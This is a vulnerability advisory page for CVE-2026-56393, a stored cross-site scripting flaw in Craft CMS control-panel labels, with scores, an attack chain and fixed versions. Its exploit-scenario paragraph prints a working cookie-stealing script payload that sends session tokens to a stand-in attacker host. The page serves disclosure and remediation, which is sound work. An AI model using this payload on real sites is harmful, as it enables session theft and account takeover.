Skip to main content

Craft CMS CVE-2026-56393

| EUVDEUVD-2026-38159 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-21 VulnCheck GHSA-f95g-vm94-46c3
4.6
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
4.6 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.8 MEDIUM

Admin credentials required (PR:H), victim must visit affected control panel page (UI:R), and payload executes across user sessions triggering a scope change (S:C).

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
A
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 06:39 vuln.today
Analysis Generated
Jun 22, 2026 - 06:39 vuln.today

DescriptionCVE.org

Craft CMS 4.x (>= 4.0.0-RC1, < 4.17.0-beta.1) and 5.x (>= 5.0.0-RC1, < 5.9.0-beta.1) contain multiple stored cross-site scripting vulnerabilities where settings names and field option labels are rendered without sanitization (e.g., via the checkbox.twig template, which used {{ label|raw }}). An authenticated administrator (with allowAdminChanges enabled) can inject malicious payloads into section names, volume names, user group names, global set names, generated field names, checkbox/radio option labels, and custom source labels, causing arbitrary JavaScript to execute in other users' control-panel sessions. Fixed in 4.17.0-beta.1 and 5.9.0-beta.1.

AnalysisAI

Stored XSS in Craft CMS 4.x and 5.x allows an authenticated administrator to persist malicious JavaScript payloads in settings fields - section names, volume names, user group names, global set names, generated field names, checkbox/radio option labels, and custom source labels - that execute in other users' control-panel browser sessions when those pages are visited. The attack surface spans seven distinct injection points across the admin settings UI, all sharing the same root defect in Twig template rendering. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attain Craft CMS admin credentials
Delivery
Confirm allowAdminChanges is enabled in target config
Exploit
Inject XSS payload into a settings name or field option label via admin UI
Execution
Victim admin or editor navigates to a control panel page rendering the poisoned label
Persist
JavaScript executes in victim's browser session
Impact
Steal session token or perform actions as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires two explicit preconditions: (1) the attacker must hold administrator-level access to the Craft CMS control panel, and (2) the `allowAdminChanges` configuration option must be set to `true` - Craft CMS's own security documentation recommends disabling this in production environments, making it a non-default production configuration. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.6 with PR:H (high privileges required) and UI:A (active user interaction) accurately reflects the constrained attack path: exploitation requires administrator credentials plus a victim admin or editor navigating affected pages. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A malicious or compromised administrator injects a JavaScript session-stealing payload into a section name (e.g., `<script>document.location='https://attacker.example/steal?c='+document.cookie</script>`) via `/admin/settings/sections`. When a second administrator or editor opens the Entries field configuration and views the sources checklist - which renders section names via the unescaped `{{ label|raw }}` Twig filter - the payload executes in their browser, exfiltrating their Craft CMS session token to the attacker. …
Remediation Upgrade Craft CMS 4.x installations to 4.17.0-beta.1 or later, and 5.x installations to 5.9.0-beta.1 or later; these are the first versions containing the fix per confirmed package metadata and patch commits at https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276 and https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Cms

View all
CVE-2020-7357 CRITICAL POC
9.9 Aug 06

Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. Rated c

CVE-2012-4405 MEDIUM
6.8 Sep 18

Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (iccl

CVE-2021-47753 CRITICAL POC
9.8 Jan 15

phpKF CMS 3.00 Beta allows unauthenticated PHP file upload by disguising it as a PNG, then renaming it for execution. Po

CVE-2019-9874 CRITICAL POC
9.8 May 31

Deserialization of Untrusted Data in the Sitecore.Security.AntiCSRF (aka anti CSRF) module in Sitecore CMS 7.0 to 7.2 an

CVE-2019-9875 HIGH POC
8.8 May 31

Deserialization of Untrusted Data in the anti CSRF module in Sitecore through 9.1 allows an authenticated attacker to ex

CVE-2012-5894 HIGH POC
7.5 Nov 17

SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and earlier allows remote attackers to execute arbitr

CVE-2012-5893 MEDIUM POC
6.8 Nov 17

Unrestricted file upload vulnerability in hava_upload.php in Havalite CMS 1.1.0 and earlier allows remote attackers to e

CVE-2015-2083 MEDIUM POC
6.8 Feb 25

Cross-site request forgery (CSRF) vulnerability in Ilch CMS allows remote attackers to hijack the authentication of admi

CVE-2012-5919 MEDIUM POC
4.3 Nov 19

Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbit

CVE-2025-5429 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5428 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5427 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

Share

CVE-2026-56393 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy